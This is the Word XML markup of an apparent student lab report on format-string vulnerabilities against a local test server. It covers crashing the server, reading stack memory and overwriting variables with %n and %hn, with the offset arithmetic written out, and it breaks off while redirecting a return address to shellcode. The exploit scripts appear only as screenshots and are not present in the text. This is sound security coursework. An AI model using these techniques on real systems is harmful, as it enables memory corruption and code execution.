          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7341F0F2" wp14:editId="2B89C80B">
            <wp:extent cx="5731510" cy="223774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4E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRPr="00844E40" w:rsidRDefault="00C4310E" w:rsidP="00844E40">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc132474984"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00997F33" w:rsidRPr="00997F33" w:rsidRDefault="00997F33" w:rsidP="00997F33">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="001C453E">
        <w:t>ending hello to server when it asks to send input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00997F33" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00997F33">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32315590" wp14:editId="0452DA1D">
            <wp:extent cx="5731510" cy="3655060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2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5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4E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E">
      <w:r>
        <w:t>Starting the serve</w:t>
      </w:r>
      <w:r w:rsidR="001C453E">
        <w:t>r where it asks for user input and as shown in the screenshot above the hello ping was sent to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00844E40">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2763BF31" wp14:editId="38AA885A">
            <wp:extent cx="5731510" cy="3688080"/>
            <wp:effectExtent l="0" t="0" r="254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8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453E" w:rsidRDefault="001C453E" w:rsidP="00C4310E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I have changed the input as to put go beyond the 1500 bytes of data that can be accepted by the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C453E" w:rsidRDefault="001C453E" w:rsidP="00C4310E">
      <w:r w:rsidRPr="001C453E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50054779" wp14:editId="7460FD07">
            <wp:extent cx="5731510" cy="108775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8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453E" w:rsidRDefault="001C453E" w:rsidP="00C4310E">
      <w:r>
        <w:t>Now the program gets stuck and crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C453E" w:rsidRDefault="001C453E" w:rsidP="00C4310E">
      <w:r w:rsidRPr="001C453E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="221F662B" wp14:editId="77D884C3">
            <wp:extent cx="5731510" cy="3743325"/>
            <wp:effectExtent l="0" t="0" r="254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4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc132474985"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="005A63B5" w:rsidRPr="005A63B5" w:rsidRDefault="005A63B5" w:rsidP="005A63B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc132474986"/>
      <w:r>
        <w:t>Task 2A</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E">
      <w:r>
        <w:t>Using the script to find the first 4 bytes of the buffer array</w:t>
      </w:r>
      <w:r w:rsidR="0087148D">
        <w:t xml:space="preserve"> on stack</w:t>
      </w:r>
      <w:r>
        <w:t>. Where a number has been added for easy identification.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00BB4844">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="362B7354" wp14:editId="51185341">
            <wp:extent cx="5731510" cy="183070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4383" w:rsidRDefault="00FC4383" w:rsidP="00C4310E">
      <w:r>
        <w:t>Sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC4383" w:rsidRDefault="00FC4383" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00FC4383">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BC470E3" wp14:editId="04222281">
            <wp:extent cx="5731510" cy="531495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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171B" w:rsidRDefault="003D171B" w:rsidP="00C4310E">
      <w:r>
        <w:t xml:space="preserve">It is evident from the screenshot below that the number has been identified as highlighted in the screenshot below and mentioned in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> variable in the screenshot above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D171B" w:rsidRDefault="003D171B" w:rsidP="00C4310E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D171B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="510F854D" wp14:editId="6695BAB8">
            <wp:extent cx="5731510" cy="369887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9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D171B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009621AB" w:rsidRDefault="009621AB" w:rsidP="00C4310E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009621AB" w:rsidRDefault="009621AB" w:rsidP="00C4310E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009621AB" w:rsidRDefault="009621AB" w:rsidP="009621AB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc132474987"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2B</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="009621AB" w:rsidRPr="003A4886" w:rsidRDefault="003A4886" w:rsidP="009621AB">
      <w:r>
        <w:t xml:space="preserve">Using this script to perform this task. Where secret address has been placed in variable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001C2008">
        <w:t xml:space="preserve"> Which will be changed to the address of the secret message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A4886" w:rsidRDefault="003A4886" w:rsidP="009621AB">
      <w:r w:rsidRPr="003A4886">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DADD268" wp14:editId="5FDE8047">
            <wp:extent cx="5731510" cy="1808480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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4383" w:rsidRDefault="00FC4383" w:rsidP="009621AB">
      <w:r>
        <w:t>Sending the script to server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC4383" w:rsidRDefault="00FC4383" w:rsidP="009621AB">
      <w:r w:rsidRPr="00FC4383">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575B8D5F" wp14:editId="6B9C1FEA">
            <wp:extent cx="5731510" cy="931545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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3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5C0" w:rsidRDefault="007225C0" w:rsidP="009621AB">
      <w:r>
        <w:t>Now it is evident from the screenshot below that the secret message as mentioned in the script as secret message has been found and displayed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007225C0" w:rsidRPr="009621AB" w:rsidRDefault="007225C0" w:rsidP="009621AB">
      <w:r w:rsidRPr="007225C0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30755C0E" wp14:editId="64205347">
            <wp:extent cx="5731510" cy="2566670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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10E" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc132474988"/>
      <w:r>
        <w:t>Task 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00F62C6C" w:rsidP="00F62C6C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc132474989"/>
      <w:r>
        <w:t>Task 3A</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00F62C6C" w:rsidRPr="001D55BB" w:rsidRDefault="001D55BB" w:rsidP="00F62C6C">
      <w:r>
        <w:t xml:space="preserve">Now to find the address of the target placed in variable named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:t>. Simply in the script modified the address with %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which modifies the value of corresponding parameter address by 4 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D55BB" w:rsidRDefault="00202891" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00202891">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B772946" wp14:editId="7993161B">
            <wp:extent cx="5731510" cy="2568575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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55BB" w:rsidRDefault="001D55BB" w:rsidP="00F62C6C">
      <w:r>
        <w:t>Sending the script to server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D55BB" w:rsidRDefault="00F36FE8" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00F36FE8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23C8B007" wp14:editId="6CC9E8CD">
            <wp:extent cx="5731510" cy="687070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8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6FE8" w:rsidRDefault="00F36FE8" w:rsidP="00F62C6C">
      <w:r>
        <w:t>The string length has been visibly modified of the string that preceded to the string printout.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36FE8" w:rsidRDefault="00F36FE8" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00F36FE8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F507FD6" wp14:editId="251F9DA6">
            <wp:extent cx="5731510" cy="1413510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1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204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00F62C6C" w:rsidRDefault="00F62C6C" w:rsidP="00F62C6C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc132474990"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3B</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00F62C6C" w:rsidRPr="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C">
      <w:r>
        <w:t>Modified the script so the address is also changed instead of just pointing to 0x5000 value. The script has been modified according to these calculations</w:t>
      </w:r>
      <w:r w:rsidRPr="00204579">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204579">
        <w:t>0x5000=20480=4+62*325+326</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00204579">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A6D5391" wp14:editId="62620791">
            <wp:extent cx="5731510" cy="2465070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6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r>
        <w:t>Sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00BD6AA1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A155D2" wp14:editId="2AE90E90">
            <wp:extent cx="5731510" cy="712470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1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6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r>
        <w:t>This is the response received.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00BD6AA1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685AA7F4" wp14:editId="6E83B3C2">
            <wp:extent cx="5731510" cy="3145790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6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>And at the bottom of it the desired value is mentioned as result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00BD6AA1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7023A93E" wp14:editId="227F39AF">
            <wp:extent cx="5263116" cy="2326011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95350" cy="2340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F5F" w:rsidRDefault="00E81F5F" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00E81F5F" w:rsidRDefault="00E81F5F" w:rsidP="00E81F5F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc132474991"/>
      <w:r>
        <w:t>Task 3C</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00DA3BD6" w:rsidRPr="00DA677C" w:rsidRDefault="00E81F5F" w:rsidP="00DA677C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I modified the script to fit the calculations </w:t>
      </w:r>
      <w:r w:rsidRPr="00E81F5F">
        <w:t>0xAABB=43707=12+693*62+729</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E81F5F">
        <w:t>0xCCDD-0xAABB=8738</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Here, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E81F5F">
        <w:t>0x080e506a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the address of the highest byte while the 0x080e5068 is the lowest two-byte address. Explaining two-bite, even though the process is the same as above task but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was used to overwrite two bytes at a time. An overall of 12 characters which explains the use of %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E81F5F" w:rsidRDefault="00E81F5F" w:rsidP="00E81F5F">
      <w:r w:rsidRPr="00E81F5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEBF176" wp14:editId="7F7F4951">
            <wp:extent cx="5475767" cy="3889942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82180" cy="3894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3BD6" w:rsidRDefault="00DA3BD6" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00DA3BD6" w:rsidRDefault="00DA3BD6" w:rsidP="00E81F5F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA3BD6" w:rsidRDefault="00DA3BD6" w:rsidP="00E81F5F">
      <w:r w:rsidRPr="00DA3BD6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A0E15CA" wp14:editId="46D415BA">
            <wp:extent cx="5731510" cy="831215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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3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3BD6" w:rsidRDefault="00DA3BD6" w:rsidP="00E81F5F">
      <w:r>
        <w:t>As the previous task when the script is received the server displays the target value which is the desired result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA3BD6" w:rsidRDefault="00DA3BD6" w:rsidP="00E81F5F">
      <w:r w:rsidRPr="00DA3BD6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="375395BA" wp14:editId="38329D88">
            <wp:extent cx="5731510" cy="402145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2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6793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRPr="00E81F5F" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc132474992"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00906793" w:rsidP="00C4310E">
      <w:r>
        <w:t>Using the following script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00906793">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33D64543" wp14:editId="5282A94B">
            <wp:extent cx="5731510" cy="515175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5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6793" w:rsidRDefault="00906793" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00906793">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDB3AF2" wp14:editId="39030DD6">
            <wp:extent cx="5731510" cy="2899410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6793" w:rsidRDefault="00906793" w:rsidP="00906793">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now leading to the modification in it which includes the starting address added with buffer and length of 1500 shellcode bytes entered by the user.</w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00906793" w:rsidRPr="00906793" w:rsidRDefault="00906793" w:rsidP="00906793">
      <w:r w:rsidRPr="00906793">
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> return address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>myprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:t>0xffffd128+0x4=0xffffd12c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00906793">
      <w:r w:rsidRPr="00906793">
        <w:t>The starting address of the shellcode: 0xffffd200+1364=0xffffD754</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00906793">
      <w:r>
        <w:t xml:space="preserve">Calculations to be used are </w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:t>0xffff=65535=12+62*1056+51</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> where 0x1D754=120660</w:t>
      </w:r>
      <w:r w:rsidR="009F645D">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:t>0x1D754-0xffff=55125</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Where it is to be noted that </w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:t>0x1D754</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is smaller than </w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:t>0xffff</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FF1516">
        <w:t xml:space="preserve"> Which leads to the following modified code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00906793" w:rsidRPr="00906793" w:rsidRDefault="00DE29F3" w:rsidP="00906793">
      <w:r w:rsidRPr="00DE29F3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67C5BE7E" wp14:editId="3A420B56">
            <wp:extent cx="5731510" cy="3051810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6793" w:rsidRDefault="00252FDF" w:rsidP="00C4310E">
      <w:r>
        <w:t>Sending the script tot the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252FDF" w:rsidRDefault="00252FDF" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00252FDF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B57B35B" wp14:editId="2CD4F5EB">
            <wp:extent cx="5731510" cy="647700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136F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E">
      <w:r>
        <w:t>This is the response on server side.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7136F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00C7136F">
        <w:rPr>
          <w:noProof/>
